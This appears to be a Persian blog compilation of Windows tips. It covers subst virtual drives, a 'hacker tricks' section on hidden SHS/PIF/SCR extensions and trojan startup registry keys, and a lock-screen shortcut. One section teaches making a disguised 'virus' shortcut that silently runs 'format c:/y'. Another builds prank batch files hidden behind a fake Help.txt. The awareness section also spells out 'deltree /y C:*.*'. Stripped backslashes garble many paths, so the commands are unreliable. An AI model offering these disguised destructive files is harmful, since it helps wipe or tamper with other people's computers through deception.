درایو مجازی بسازید

درایو مجازی بسازید ( بدون نرم افزار)

هنگامی که صحبت از درایو مجازی می شود، ذهن بسیاری از کاربران به سمت نرم افزارهای خاصی می رود که قابلیت ساخت یک درایو مجازی را دارند. اما در حقیقت نیازی به تهیه و نصب این چنین نرم افزارهایی نیست. کمی صبر و حوصله و بی تردید دقت، می تواند یاورشما در ایجاد این چنین درایوی در محیط ویندوز باشد. شاید نتوان قابلیت های ویژه ایی که سری نرم افزارهای فوق در ساخت درایو مجازی بکار می برند را ایجاد کرد، اما ساخت یک درایو مجازی آن هم بدون نرم افزار، خالی از جذابیت نخواهد بود.

قبل از شروع عملیات لازم است ذکر کنم ایجاد چنین درایوهایی هیچ ربطی به پارتیشن بندی هارد دیسک ندارد و سلامت سیستم عامل شما را به خطر نخواهد انداخت. بنابراین نگران از دست رفتن اطلاعات خود نباشید. ضمنا اگر خوشتان نیامد راهی برای از بین بردن درایو مجازی وجود دارد. تا انتهای این مقاله با ما باشید.

برای ساخت درایو مجازی در این آموزش از فایل های خود ویندوز کمک می گیریم. اینبار به سراغ فایل اجرایی Subst.exe می رویم. این فایل در پوشه system32 که در پوشه windows قرار گرفته موجود است. این فایل به همراه سیستم عامل داس ارائه شده و اجرای آن در حالت اولیه کار هیچ عکس العملی نشان نخواهد داد. کلمه Subst برگرفته از کلمه Substitution به معنای جایگزینی و علی البدلی است و در حقیقت برای جانشین کرد یک دایرکتوری به یک درایو بکار می رود.

به این معنی که با اجرای این دستور می توانید محتویات یک فولدر خاص را به یک درایو تبدیل کنید و آن را در My Computer نشان دهید. گاهی اوقات گشتن به دنبال پوشه ایی در میان انبوه فایل ها و فولدرهای در یک درایو خاص وقت گیر است. این کار می تواند این امر را تسهیل بخشد.

مسلما عملیاتی مانند کپی و کات فایل ها یا حتی نصب برنامه ها در درایو هایی که به این روش ایجاد می شوند مقدور خواهد بود اما در مورد عملیات سیستمی مانند فرمت یا اسکن دیسک امکان پذیر نیست. حال چگونه از این Subst استفاده کنیم؟

به Run یا Command Prompt ویندوز وارد شوید ( توضیح: Run در خود منوی استارت ویندوز موجود است و همچنین برای ورود به Command Prompt در فیلد Run کلمه cmd را تایپ و اینتر کنید ) حال باید دستوری مطابق شکل زیر تایپ کنید (شکل کلی فرمان):

Subst NewDriveName: Folder Direction

فکر نکنم نیاز به توضیح چندانی باشه NewDriveName نام درایو جدیدی که قصد دارید ایجاد کنید. دقت کنید که این نام مشابه نام درایوهای موجود نباشه و Folder Direction مسیر پوشه ایی که قصد دارید اون رو به صورت درایو مجازی در بیارید. برای نمونه، مثال های زیر درایوهایی با نام K و L ایجاد خواهند کرد. درایو K جایگزینی برای محتویات پوشه C:part و درایو L جایگزینی برای مسیر C: Program FilesAdobe .

Subst K: C:part
Subst L: C: Program FilesAdobe

توجه! مدت دوام این درایو های مجازی بعد از ریستارت سیستم پایان می پذیرد و با یک بار ریستارت سیستم، دیگر این درایوها را نخواهید دید. برای جلوگیری از این امر چندین راه وجود دارد که بعلت کمی فرصت تنها یکی را شرح می دهیم.
در سیستم عامل های Dos و Win9x ساده ترین راه ویرایش فایل Autoexec.bat خواهد بود. این فایل را در درایو C بیابید و خطوط مربوط به Subst را در آن تایپ کنید تا در هر بار ریستارت سیستم به تبع آن Subst ایجاد شود. در سیستم عامل های xp و 2000 بهترین و راحترین کار این است که یک فایل اجرایی با پسوند .bat یا همان BatchFile ایجاد کنیم و خود فایل یا Shortcut آنرا در استارتاپ سیستم قرار دهیم. یا می توانیم مسیر را در رجیستری ایجاد کنیم.

حال چگونه فایل اجرایی یا همان BatchFile را ایجاد کنیم. مسیر زیر را برای باز کردن یک صفحه notepad طی کنید:

Start All ProgramsAccessories otepad

از منوی فایل Save as را انتخاب و در مسیری دلخواه فایل را با پسوند bat ذخیره کنید. حال به سراغ فایلی که ایجاد کرده اید بروید. بر روی آن راست کلیک و Edit را برگزینید و دستورات مربوط به Subst را در آن تایپ و فایل را ذخیره کنید. حال نوبت به مسیردهی این فایل در رجیستری می رسد. به رجیستری وارد شوید( در فیلد Run کلمه Regedit را تایپ کنید). مسیر زیر را طی کنید:

HKEY_CURRENT_USERSOFTWARE
MicrosoftWindowsCurrent VersionRun

حال در بخش سمت راست محیط رجیستری راست کلیک کرده و پس از انتخاب گزینه New گزینه String Value را انتخاب سپس یک نام به ارزش ایجاد شده داده و با دابل کلیک بر روی آن در قسمت Value Date آدرس BatchFile را که در مرحله قبل ایجاد کرده اید، وارد کنید. بر روی ok کلیک و از رجیستری خارج شوید. اگر مراحل را درست طی کرده باشید این بار با ریستارت ویندوز درایوهای مجازی دوباره ایجاد خواهند شد.

حال اگر پشیمان شدید و قصد حذف درایو مجازی را داشتید طبق زیر عمل کنید:
پس از پاک کردن دستورات اضافه شده در فایل Autoexec.bat در سیستم عامل های Dos و Win9x و یا پاک کردن Shortcut یا خود فایل bat از استارتاپ سیستم و یا پاک کردن ارزش رشته در رجیستری برای سیتم عامل های xp و 2000 سیستم را یک بار دیگر ریستارت کنید. اگر هم بخواهید این کار را بدون ریستارت انجام دهید کافیست در Run یا Command Prompt دستور زیر را تایپ کنید:

Subst NewDriveName: /d

که NewDriveName نام درایوی که قصد پاک کردن آن را دارید می باشد.

ترفندهای هکرها

ترفندهای هکرها

هدف ما این است که با افشای “ترفندهای هکر” استفاده کنندگان از اینترنت با دانش و ابزارهای مورد نیاز، آمادگی بهتری پیدا کنند تا فریب ترفندهای هکر را نخورند. پسوندهای پنهان فایلهای ویندوز ممکن است از این موضوع آگاهی نداشته باشید، اما حتی اگر به ویندوز بگویید که تمام پسوندهای فایل را نشان دهد، هنوز هم فایلهایی وجود دارند که بطور پیش فرض مخفی شده‌اند. همچنین هر برنامه نصب شده‌ایی می‌تواند پسوندها را پیکربندی کند تا پنهان شوند. در اینجا در مورد چگونگی انجام این کار و همچنین دلیل اینکه چرا برخی از پسوندهای پنهان می‌توانند برای تعدادی از کاربرهای کامپیوتر خطرناک باشند، مثالهایی آورده شده است. به فرض اینکه شما قبلا ویندوز explorer را برای نشان دادن تمام پسوندهای پیکربندی کرده‌اید. پسوندهای SHS یک کپی از notepad.exe بگیرید و آن را روی desktop خود قرار دهید. Wordpad را باز کنید. روی notepad.exe کلیک کنید و آن را به سمت سند باز شده wordpad بکشید. روی notepad.exe کلیک کنید و آن را به عقب به سمت desktop بکشید. فایلی را که ایجاد شده است (Scrap) به Readme.txt تغییر نام دهید. حالایک آیکن که نشان دهنده سند متنی است و فایلی با نام مشخص readme.txt بر روی desktop شما وجود دارد کلیک کردن بر روی فایل فوق باعث می‌شود notepad باز ‌شود. اگر این فایل یک Trojan باشد، شما فریب خورده‌اید و توسط آنچه که یک فایل متنی بی‌خطر بنظر می‌رسید آلوده شده‌اید. اگر اجازه نمایش این پسوند داده می شد شما فریب فایل Readme.txt.shs را نمی‌خوردید. پسوندهای PIF اگر سعی کنید تا notepad.exe را به anything.txt.pif تغییر نام دهید، تنها فایلی با نام anything.txt روی desktop خود خواهید دید. و این بدین دلیل است که PIF پسوند دیگری است که ویندوز بطور پیش فرض پنهان می‌کند. اگر شما فایل را اجرا کنید برنامه اجرا خواهد شد، به خاطر اینکه ویندوز پسوندهای PIF را اجرا خواهد کرد حتی اگر آنها فایلهای اجرایی باشند. پسوندهای SCR پسوند دیگری که باید مراقب آن بود SCR است. کپی notepad.exe خود را به notepad.scr تغییر نام دهید و روی آن کلیک کنید. Notepad به عنوان یک فایل اجرایی اجرا خواهد شد. بسیاری از افراد توسط هکرهایی فریب می‌خورند که account یک قربانی را بدست آورده‌اند. هکر email یا هر نوع پیغامی را به تمام دوستان قربانی می‌فرستد که "این صفحه نمایش جدید و بامزه را ببینید از خنده روده بر خواهید شد!" از آنجایی که این پیغام از یک منبع مطمئن آمده، اکثر افراد فریب خورده و فایل SCR را اجرا می‌کنند که در نهایت به هکری ختم می‌شود که به کامپیوتر شما متصل شده است. فرمانهای خطرناکی که می‌توانند گنجانده شوند پسوندهای میانبر PIF برخی از پسوندهای پنهان فایل قادرند به سادگی با فرمانهای پنهان شده‌ای که می‌توانند برای سیستم شما مخرب باشند برنامه‌ریزی شوند. این یک آزمایش ساده است: دکمه راست ماوس خود را روی desktop کلیک کنید و New و سپس Shotcut را انتخاب نمایید. در Command line تایپ کنید: format a:/autotest Next را کلیک کنید. در "Select a name for the shortcut" تایپ کنید: readme.txt سپس Next را کلیک کنید. یک آیکن notepad را انتخاب کرده و Finish را کلیک کنید. حالا شما در desktop خود فایلی با نام readme.txt و با آیکن notepad دارید. مطمئن شوید که در درایو شما دیسکی است که از دست دادن آن برای شما اشکالی ندارد و روی آیکن کلیک کنید. فایلی که شما روی آن کلیک کرده‌اید درایو A: را فرمت خواهد کرد. البته آیکن هکر درایو دیگری را مورد هدف قرار خواهد داد یا ممکن است نامی همچون ‘game.exe’ و فرمانی برای حذف کردن دایرکتوری ویندوز شما یا (deltree /y C:*.*) کل درایو C شما داشته باشد. اگر پسوند PIF پنهان نشود، قادر به فریب شما نخواهد بود. پسوند SHS فایلهای Scrap نیز می‌توانند فرمانهای گنجانده شده را پنهان کند. این یک آزمون ساده است: از notepad.exe یک کپی بگیرید و آن را روی desktop خود قرار دهید. Wordpad را باز کنید.Notepad.exe را کلیک کنید و آن را به سمت سند باز شده wordpad بکشید. روی Edit کلیک کنید و Package Object و سپس Edit package را انتخاب کنید. روی Edit و سپس Command Line کلیک کنید. در کادر، دستوری مانند format a:/autotest را تایپ کنید و روی OK کلیک کنید. آیکن نیز می‌تواند از این پنجره تغییر یابد. از پنجره خارج شوید، این کار سند را به روز خواهد کرد. روی notepad.exe کلیک کنید و آن را به عقیب به سمت Desktop بکشید. فایلی را که ایجاد شده (Scrap) به Readme.txt تغییر نام دهید. حالا شما آنچه را که شبیه یک فایل متنی است دارید. اگر این فایل اجرا شود درایو A: را فرمت خواهد کرد. همانگونه که در مثال بالا برای پسوندهای میانبر PIF دیده شد، هکر می‌تواند از فرمانهای خطرناکتری استفاده کند. روشهای Trojan در هنگام راه اندازی روشهای راه اندازی استاندارد اکثر افراد از راههای متفاوتی که هکرها برای راه اندازی فایلهای Trojan استفاده می‌کنند آگاه نیستند. اگر هکری کامپیوتر شما را با یک Trojan آلوده کند، نیاز به انتخاب یک روش راه‌اندازی خواهد داشت، بگونه‌ای که در زمان راه‌اندازی مجدد کامپیوتر شما Trojan بارگذاری شود. روشهای معمول راه‌اندازی شامل کلیدهای اجرایی registry، فولدر راه اندازی ویندوز، Windows Load= یا run=lines یافته شده در فایل win.ini و shell=line یافته شده در system.ini ویندوز می‌باشند. روشهای راه اندازی خطرناک از آنجایی که فقط تعداد اندکی از این روشهای راه اندازی وجود دارند، هکرهای زیادی را یافته‌ایم که در پیدا کردن روشهای جدید راه‌اندازی افراط می‌کنند. این شامل استفاده از تغییرات خطرناکی در سیستم registry می‌باشد، که در صورتی که فایل Trojan یا فایل همراه آن از بین برود سیستم را بصورت بلااستفاده درخواهد آورد. این یک دلیل استفاده نکردن از نرم افزار ضد ویروس برای از بین بردن Trojanهاست. اگر یکی از این روشها استفاده شود، و فایل بدون ثابت کردن registry سیستم از بین برود، سیستم شما قادر به اجرای هیچگونه برنامه‌ای پس از راه اندازی مجدد کامپیوترتان نخواهد بود. قبل از آنکه سراغ registry برویم لازم به توضیح است که یک فولدر به صورت C:WINDOWSStartMenuProgramStartUp وجود دارد که هر فایلی در اینجا باشد هنگام راه اندازی ویندوز اجرا خواهد شد.توجه داشته باشید که هرگونه تغییری می‌تواند سیستم شما را به خطر بیاندازد بنابراین، هرچه ما می‌گوییم انجام دهید. برای دستیابی به registry به منوی start>run> بروید و "regedit" را بدون علامت " " تایپ کنید. در registry چندین مکان برای راه اندازی Startup وجود دارد که لیستی از آنها را در اینجا می آوریم. [HKEY_CLASSES_ROOTexefileshellopencommand] =""%1" %*" [HKEY_CLASSES_ROOTcomfileshellopencommand] =""%1" %*" [HKEY_CLASSES_ROOTatfileshellopencommand] =""%1" %*" [HKEY_CLASSES_ROOThtafileShellOpenCommand]=""%1" %*" [HKEY_CLASSES_ROOTpiffileshellopencommand] =""%1" %*" [HKEY_LOCAL_MACHINESoftwareCLASSESatfileshellopencommand] =""%1" %*" [HKEY_LOCAL_MACHINESoftwareCLASSEScomfileshellopencommand]=""%1" %*" [HKEY_LOCAL_MACHINESoftwareCLASSESexefileshellopencommand]=""%1"%*" [HKEY_LOCAL_MACHINESoftwareCLASSEShtafileShellOpenCommand]=""%1"%*" [HKEY_LOCAL_MACHINESoftwareCLASSESpiffileshellopencommand]=""%1"%*" اگر این کلیدها مقدار ""%1"%*" را نداشته باشند و به جای اجرای فایل در هنگام راه اندازی به ""Server.exe %1" %*" تغییر یابد به احتمال زیاد یک Trojan است. روش راه اندازی ICQ روشی راه اندازی دیگری که امروزه استفاده از آن معمول است شناسایی شبکه ICQ می‌باشد. بسیاری از کاربران ICQ نمی‌دانند که هکر می‌تواند یک خط پیکربندی را به ICQ اضافه نماید تا با هر بار بارگذاری شدن برنامه Trojan نیز راه اندازی شود. به عنوان آزمایش مراحل زیر را انجام دهید: ICQ را باز کنید. روی آیکن ICQ کلیک کنید و preference را انتخاب نمایید. روی Edit launch List کلیک کنید. روی Add کلیک کنید. روی Browse کلیک کنید. فایلی را برای اضافه کردن به Windows otepad.exe بیابید که به کار این آزمایش بیاید. روی Open و سپس OK کلیککنید. زمانی که شما ICQ را راه اندازی مجدد می‌کنید فایل اجرا خواهد شد.

ویروسی برای فرمت هر درایوی که دلتان بخواهد

ویروسی برای فرمت هر درایوی که دلتان بخواهد

امروز می خوام به شما یاد بدم که چه جوری یک فایل فرمت درست کنید که بدون سوال yesوno فرمت کنه.

اول از قسمت new (در کلیک راست) یک new short cut بسازید،بعد در اولین صفحه ای که باز     بنویسید format c:/y  بعد از زدن next در صفحه ای که باز میشه اسمی برای فایلتان در نظر بگیریدو در صفحه بعد هم یک آیکون برای فایلمان در نظر می گیریم.

حالا به به properties فایل رفته و در برگه screen در قسمت usage گزینه full screen را بزنید.

نکته : هیچ وقت درایو سی یا دی را به عنوان فرمت کننده قرار ندهید چون کار نمی کند

با یک کلیک بر روی آن سیستم شما در حالت Lock قرار میگیرد.

با یک کلیک بر روی آن سیستم شما در حالت Lock قرار میگیرد.

با طی مراحل زیر شما می توانید یک Icon به صفحه نمایش یا Quick Launch اضافه کنید که با یک کلیک بر روی آن سیستم شما در حالت Lock قرار میگیرد.
1- بر روی صفحه نمایش خود Right-Click کنید و از Shortcut، New را انتخاب کنید .
2- در پنجرهای که ظاهر شده در قسمت Type the location of the item فرمان زیر را بنویسید:
rundll32.exe user32.dll,LockWorkStation
3- Next را بزنید و نام Shortcut را وارد کنید و کلید Finish را بزنید

ZeroZone

ZeroZone

امروز میخواهم ویروسZeroZone را به شما معرفی کنم.این ویروسTimeZone ویندوز را صفر میکند.یعنی تایم ویندوز و روز آن صفر میشود.هیچ ضرری برای کامپیوتر ندارد فقط باید دوباره زمان و روز ویندوز خود را تنظیم کنید.و بیشتر برای ترساندن به کار میرود.

بازهم مثل همیشه Notepad

قسمت را با کلیدهای کنترل سی و کنترل وی بردارید در غیر این صورت جواب نمی گیرید)
@Echo offtime=0:0:0
حال آن را با نام Time0.bat سیو کنید.
بعد دوباره NotePad را باز کرده و کد زیر را در آن تایپ کنید.
@ECHO OFFdate=10-10-10

این فایل را هم مثل فایل قبلی با نام Date0.bat سیو کنید.
حال دوباره NotePad را باز کرده و کد زیر را در آن تایپ کنید.
@echo offecho I AM A VIRUSecho SEAT AND SEE MY POWER!!!...pause

و آن را با نام Comment.bat ذخیره کنید.
یه NotePad باز کرده وکد زیر را در آن تایپ کنید.
START TIME0START DATE0START comment
وآن را با نام Help.bat ذخیره کنید.
بر روی فایل آخر رایت کلیک کرده و Create ShortCut را بزنید و نام آنرا به Help.txt تغییر دهید.
سپس با رایت کلیک بر روی Help.txt وانتخاب Properties و زدن Change Icon یه آیکون برای فایل خود انتخاب کنید.
بقیه فایلها را در یک Folder ذخیره کنید که شما میتوانید آن Folder را نیز Hidden کنید.
حال ویروس ما آماده است